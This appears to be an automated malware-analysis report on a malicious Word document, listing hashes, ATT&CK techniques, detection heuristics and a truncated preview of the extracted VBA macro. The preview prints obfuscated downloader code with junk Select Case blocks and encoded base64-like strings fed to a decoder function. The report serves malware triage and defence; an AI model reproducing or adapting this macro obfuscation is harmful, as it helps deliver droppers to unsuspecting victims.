Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 af9bdad4cfd538b6…

MALICIOUS

Office (OLE)

Size: 212.0 KB
Created: 2018-03-21 14:35:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: c58026be64edad4f40ced2414c9586b3
SHA-1: 3c4ffcc7de76fc2bca42ee076535c501c72a6965
SHA-256: af9bdad4cfd538b6bf23617db51e6499b21eda57aff97e739fba65f3da63631f
Risk score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing substantial VBA macro code, including an AutoOpen macro that calls CreateObject, which indicates an attempt to execute code as soon as the document is opened. The presence of legacy WordBasic and Excel 4.0 (XLM) macro markers further supports malicious intent. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the extracted 'macros.bas' file are the key indicators of downloader or dropper malware.

Heuristics (9)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 78796 bytes
SHA-256: 8f2257a2ef6c306e9ce6a626346feef934a6d918ddb9400132f74a1da3952a7d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 long base64-like blob(s).
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "wJFcflwuwq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hHCAEKhwrlztl"
Function KNWwcadFS()
On Error Resume Next
Select Case auwMRz
         Case 43511
            PIaqv = JSvWoq
            sowtz = zMoGVm
            RBtiwB = Cos(32394 * CBool(64234))
         Case 47159
            VajSGn = 93073
            ntchFz = Fix(35693)
            RZobB = Oct(8530)
End Select
SbwraKEhFJD = JdXATb("laAUGAzAgMAMGA3AAOAADAmBQYAUGA3AgNAADA0AQYAMDAzAgNAQGAzAAOAUGA2AAMAQDA4AANAgDA3AgMAQDAjBwYAMDAkBAZAYGAlBgMAMGAkBQZAcDA5AwYAgDA3AAOAYDAlBAZAQGAhBQYAIGA3AgZAcDAiBQOAEGA1AgMAUGAlBgMAEDA5AAZAIDA5Aw4Fwd", 5 + 0, 191 + 0)
Select Case CRIYM
         Case 50231
            ZXUCcT = NqZrj
            tPjvuQ = jrswkR
            iBzPj = Cos(638 * CBool(1412))
         Case 37789
            NDWzD = 7962
            PjVWKm = Fix(63813)
            iwzDi = Oct(59538)
End Select
Select Case cPJPc
         Case 13456
            ZMYjju = VwhjF
            EwriN = RPjEiY
            KHfjsw = Cos(28229 * CBool(97714))
         Case 19666
            LAbRvn = 79511
            rjMBfX = Fix(59270)
            hpOpH = Oct(88622)
End Select
dwtqdzIj = JdXATb("7ufQOAUGAiBAZAYDA4AwNAADA1AAOAMGAmBAOAEGA5AAZAEGAmBQZAEDAhBwMAQDAlBgZAIDAyAwNAgDA2AwNAADAiBAOAEGAwAQYAYGAiBwYAgDAmBQOAYDAxAQNAIGAiBQYAkDAmBwMAgDA1AQYAgDAyAwYAYGA2AQNAYDAzAQ7bt2", 5 + 0, 169 + 0)
Select Case BkMpO
         Case 77745
            qNuVfi = iWbuSn
            SIbIEq = ZkUTR
            Zhiwaw = Cos(15002 * CBool(79450))
         Case 96415
            KrAPC = 37260
            vpGQib = Fix(71280)
            KzTRda = Oct(3124)
End Select
Select Case YGZozH
         Case 67615
            cfdAK = jLnjla
            jPqwX = kiNGN
            QwBmsD = Cos(31936 * CBool(38658))
         Case 92952
            KMMtoK = 38364
            nVMkr = Fix(82011)
            raEwfP = Oct(49013)
End Select
OkZvOrnLS = JdXATb("7tjpkPADAmBgZm", 2 + 0, 7 + 0)
Select Case WtffY
         Case 91447
            UGInEi = dOZOAS
            SfGKDA = MVRdlz
            zJfvRK = Cos(2530 * CBool(11008))
         Case 55486
            lFHwq = 49230
            OGXEO = Fix(48625)
            VvzIl = Oct(82340)
End Select
Select Case kfsua
         Case 24084
            DTsHi = BcQFbQ
            DRCjzu = qwXFA
            lJJPN = Cos(33288 * CBool(16323))
         Case 42927
            tEqNUE = 57019
            ZmVUA = Fix(35561)
            IufvXH = Oct(92867)
End Select
tjTbWacG = JdXATb("bFNCDAzAQZAEGAzAQYAEGA1AwYAcDAxAAZAMGA3AgNAEDAhBgMAADA3AwYAEGA4AAMAYGAkBgMAEGA2AAOAMGAjBAZAUDAhBQZAkDAlBQNAIDAjBgMAkDAkBgZAYGA0AwNAMGAjBgMAMDAlBwYAADA2AQOAQDAxAQYAMDA0AQfb%", 4 + 0, 165 + 0)
Select Case GFLrTB
         Case 85308
            HZOXw = maMMnw
            fFkrj = SlMwi
            RjHINK = Cos(15639 * CBool(63272))
         Case 55303
            umuiO = 14903
            jLTwU = Fix(50958)
            bAmuZY = Oct(89813)
End Select
Select Case issiZS
         Case 36298
            SDIoK = MBhptL
            GDwfX = sIzob
            QjzYIr = Cos(16253 * CBool(34176))
         Case 97417
            jdpGQ = 48567
            IAiujc = Fix(78375)
            wCuatT = Oct(29542)
End Select
BPNBd = JdXATb("Jo hGA2AwMAcDA0AwMAUDAiBwNAMDA0AAOAIDA3AQZAY7wIhnfG", 3 + 0, 40 + 0)
Select Case LuNMcY
         Case 96763
            uGCWVq = GTJqn
            jjDKiK = NrFjRw
            MDMVkB = Cos(93821 * CBool(99922))
         Case 50297
            RYIlo = 13927
            dbncKJ = Fix(3252)
            OIXCBS = Oct(10727)
End Select
Select Case biASJB
         Case 29945
            fKnai = uwikfc
            dowSG = HblEj
            jCiPz = Cos(3689 * CBool(1331))
         Case 87147
            mYFzHq = 55242
            YWqLiw = Fix(87683)
            
... (truncated)